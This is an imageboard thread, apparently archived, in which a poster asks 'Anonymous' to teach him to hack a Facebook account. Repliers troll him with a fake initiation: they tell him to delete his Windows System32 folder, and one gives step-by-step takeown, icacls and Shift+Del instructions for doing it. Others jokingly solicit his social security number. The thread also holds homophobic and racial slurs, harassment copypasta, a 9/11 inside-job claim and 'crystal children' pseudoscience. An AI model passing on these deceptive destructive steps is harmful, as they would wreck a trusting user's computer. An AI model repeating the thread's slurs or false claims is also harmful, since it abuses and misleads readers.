Hello my fellow anonymous

Hello my fellow anonymous.

I'm calling on you.

It was hard finding you here.

I was looking for you on the internet and finally a nice member from your army helped me.

And I was told you were on this forum.

And it's kinda smart I give you that, a forum where the messages are erased few moments later it's the best for an anonymous. Very convenient to do Darkweb, intelligency, hack, government files etc stuff.

I'm an Humble servant and I need your help please.

I know that the image with the alert symbol of the anonymous should only be used in ermergency cases.
But I need you my friends.

I want to join you.
I need you to teach me your ways, your knowledge.

I need to hack a facebook account teach me how please masters. If you could teach me how to proceed with a WOW and Habbo account too pls.

I'll be forever in your debt.

"We are legion. We do not forgive. We do not forget. Expect US"

Other urls found in this thread:

youtu.be/7nqcL0mjMjw
twitter.com/NSFWRedditVideo

I'm a goofy Goober.

Answer this and I will consider your offer, do you believe in the illuminati? Who did 9/11?

First, you must delete your "c:\windows\system32" folder.

Report back when you have done this, for the next step in your Annony-mouse hacking vision quest journey.

/faceplam

Anonymous isn't here right now, but if you leave your name and number, street address and social, I will make sure they get back to you in a timely fashion. Have a nice day, and enjoy your stay here.:)

Yes Illuminati are your ennemies.
I do not know a lot of stuff about 9/11 but I know it was an inside job.
And I need you to learn me all that.

Dude stop, he is not ready yet for such a thing.

Welcome, brother. We are Anonymous.

And we shall guide you through your first hacking journey.

First you must ensure your PC can hack.
Go to C: and delete your System32 folder. This will remove the anti-hacking measure that Microsoft imposes.

Do this and we shall guide you through the next steps.

Will this work on a laptop, and how do I find this

I can't trust you yet, you need to delete your system 32 as the other brothers stated, then we can trust you. You will receive a message on your nearest device after deleting it.

Wtf is my system 32 and where is it at on my pc

You're unworthy, fool. You can call yourself Anonymous, but you'll never be a true one.

you first have to start of with gas.. dump about a gallon on your keyboard make sure you soak the "any" key and light with a match....it will hack it self

Click “Start,” type “cmd” and press the “Ctrl,” “Shift” and “Enter” keys together to load the Command Prompt console with administrative privileges.
Type “takeown /f C:\Windows\System32” and press “Enter” to take ownership of the System32 folder.
Type “Icacls C:\Windows\System32 ” and press “Enter” to give yourself rights to delete the "System32" folder.
Close the Command Prompt console by typing “Exit” and then pressing “Enter.”
Close all applications that are running on your computer.
Double-click the “Computer” icon on the Windows desktop to open “Windows Explorer.”
Double-click the icon labeled “Local Disk C:” and then enter the folder labeled “Windows.”
Select the folder labeled “System32” by clicking on it.
Press the “Shift” and “Del” keys together and click “Yes” on the “Delete Folder” confirmation dialog box to delete the "System32" folder. Click “Yes to All” on any “File Delete” dialog boxes that you encounter during the file deletion process.

I'm not the op I just wanna know how to get Microsoft from not looking into my files

and what does this do exactly

You can't really join Anonymous with some kind of acceptance and stuff like that. Anonymous isn't just about hacking. Hacking is just expedient to fight for their ideology...

that is the extended version and more effective way of deleting system32 and ensuring a hacking environment for the PC

this guy knows, follow what he says

>Also post photos with your phone of what is happenning so we can track errors ad enable your hacking capabilities

hides your identity, makes you anonymous to anyone monitoring your cpu.

well there fuck head i deleted my system 32 and all it did was show pic of your dad with your fist up his ass

Do as our brother says. We shall contact your device after the deletion of System32 opens up the hacker's chat line.

good job user

Ok cool thanks guys I'm gonna try it, how will you contact me

This will stop microsoft from stopping us. We will send you hacking tools and the anonymous forum. We are expecting you.

Allows you to download more RAM aswell.

posting in bait threat just because.

with all this good advice coming from an heros

That is upto us. We will see how well you can hack first.

make sure your blinker fluid is full too

Once the system 32 is removed you have to come back and the secret chat room will be provided

It can't be entered if you have it, as microsoft could backtrack it and close it. So we need you to delete system32 first, as a question of safety

Oh you want me to show you as I destroy my computer.

Delete this.

IMPORTANT!!!! MAKE SURE YOU ARE NOT CONNECTED TO THE INTERNET OR ELSE WE ARE ALL BUSTED.

This is the first step in joining Legion.

>spoonfeeding
It's like you WANT Anomalous to be taken over by a bunch of skiddies.

ok i just gave him my ss number and bank info all i got was like a millon bit coins

dont worry i dont have internet

>million bit coins
Do you know how much one BitCoin is worth, faggot?

Greetings, brothers.
I was informed of the case, is the entire council gathered?

I can send him his crypto-currency digital wallet whenever you feel he's ready, please vote on how much should we give him.

Also, check up my dubs.

>I'm an Humble servant and I need your help please.
>I'm an Humble servant
>an Humble servant

newfag

Nice trips faggot

ummm yea i know what bit is worth thats why you sucked MY DICK BITCH

this fuckin guy

Thank you, faggot

prob suck dick for one bit coin lol

Kek

prob go no gag for 2

Nah, he sucked 400 dicks. He's a one dollar whore.

i knew it

>Kek
Back to Sup Forums and the infamous Sup Forums board, you degenrate. Get out of reddit now!

so hes a real pro

Follow it nigguh

Nice dubs faggot.

Learn to quick reply, newfag. It's confusing when you don't have the post number you're replying to in your post.

sorry bro corrasponding from myspace

Nice maymay, faggot

>Being this fucking new.
>kys nigguh

Nice double dubs, faggot.

Nice nothings, faggot

Hard finding us? The mere fact that you don't know this is exactly where anonymous started means you're fukk of shit.

There he is. There he goes again. Look, everyone! He posted it once again! Isn’t he just the most intelligent guy around?! Oh my God.

I can almost see your pathetic overweight frame glowing in the dark, lit by your computer screen which is the only source of light in your room, giggling like a like girl as you once again type your little edgy Anonymous thread up and fill in the captcha. Or maybe you don’t even fill in the captcha. Maybe you’re such a disgusting NEET that you actually paid for a Sup Forums pass, so you just choose the picture. Oh, and we all know the picture. The “epic” Anonymous group, isn’t it? I imagine you little shit laughing so hard as you click it that you drop your Doritos on the floor, but it’s ok, your mother will clean it up in the morning. Oh, that’s right. Did I fail to mention? You live with your mother. You are a fat fucking fuckup, she’s probably so sick of you already. So sick of having to do everything for you all goddamn day, every day, for a grown man who spends all his time on Sup Forums posting about a fucking banana. Just imagine this. She had you, and then she thought you were gonna be a scientist or an astronaut or something grand, and then you became a NEET. A pathetic user-fag NEET. She probably cries herself to sleep everyday thinking about how bad it is and how she wishes she could just disappear. She can’t even try to talk with you because all you say is “WE DO NOT FORGIVE, WE DO NOT FORGIVE.” You’ve become a parody of your own self. And that’s all you are. A sad little man laughing in the dark by himself as he prepares to indulge in the same old dance that he’s done a million times now. And that’s all you’ll ever be.

>habbo account

Nice quads faggot.

nice dubs, faggot

well

Phew... This is what autism looks like. Waste of trips.

>nice dubs, faggot
>nice dubs
>dubs

you tell him faggot

Autism doesn't exist. What you call an autist is a crystal child.

The Crystal children began to appear on the planet from about 1990-2010, although a few scouts came earlier. Their main purpose is to take us to the next level in our evolution and reveal to us our inner and higher power. They function as a group consciousness rather than as individuals, and they live by the “Law of One” or global oneness. They are also advocates for love and peace on this planet.

They are mostly born into the Gold Ray of Incarnation and Evolution, which means they have access to gifts of clairvoyance and healing. They are born on the sixth dimension of consciousness, with the potential to open up rapidly to the ninth dimensional level of full Christ consciousness, and then from there to the thirteenth dimension, which represents universal consciousness.

Crystal children’s auras aren’t specifically opalescent, but are octarine, which is a color that isn’t in the normal visual range of human eyes, but is the manifest color of high magic, and on another color octave entirely. They have beautiful pastel hues to them. To the untrained eye, it appears to be without color at all, therefore Crystal, but the extremely high frequency of the energy field is what gives it away.

The first thing you will recognize about Crystal children is their forgiving nature. They are very sensitive, warm, and caring. Don’t mistake these characteristics as a sign of weakness as Crystal children are also very powerful.

Meme magic, faggots

What the fuck did you just fucking say about me, you little bitch? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the fuck out with precision the likes of which has never been seen before on this Earth, mark my fucking words. You think you can get away with saying that shit to me over the Internet? Think again, fucker. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, maggot. The storm that wipes out the pathetic little thing you call your life. You’re fucking dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable ass off the face of the continent, you little shit. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your fucking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you goddamn idiot. I will shit fury all over you and you will drown in it. You’re fucking dead, kiddo.

H-how did you manage to type that out in a minute, fampai?

It's called copypasta, you NEET

telnet://d1st.org if you wanna join...

Sorry, I was mistaken. You're an Aspie, your sperging little cunt.

Welp, this thread is autistic as all hell.
>Pasta
>Newfags
And more!
Sage

Don't announce sages, you fucking newfag cancer. SAGED.

You must pass the initiation. If you pass, you're in. Ready?

Oooooohh... That cheese has a lot of pizza... B& 4 da B8

Hello user fam.

i'm drunk and fuck all of you

Have you done what we've asked of you?

Dude fuck off! Anonymous ist about hacking Facebook for nudes...
If you just ask for help on this boars, im sure pretty much anons would tip you about hacking. Your faggotry is an insult and should be dealt with.

youtu.be/7nqcL0mjMjw
I really really like this song... although I never heard it before

Check 'em

Dubs speaks truth...
I said it all don't ask me...